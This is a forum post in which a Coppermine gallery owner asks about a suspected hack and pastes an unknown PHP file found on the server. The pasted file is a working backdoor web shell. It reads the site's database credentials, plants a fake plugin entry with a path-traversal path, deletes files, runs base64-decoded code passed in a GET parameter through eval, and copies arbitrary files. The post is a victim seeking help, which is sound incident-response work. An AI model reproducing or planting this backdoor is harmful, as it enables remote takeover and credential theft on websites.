Hi guys!
I just realised something shoking:
I found out in the copper/album directory a txt file which is the exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are other 2 unknown files in this directory. One of them is a php files which contains the code listed at the end of this topic.
Do you have any idea about what this it?
Thank you in advance!
<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash="b269fcfd....23ec7fad79df17";
if(eregi("picEditor", $REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>';
$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>
Author
Topic: config.inc.php to txt - Hacking attempt? (Read 2873 times)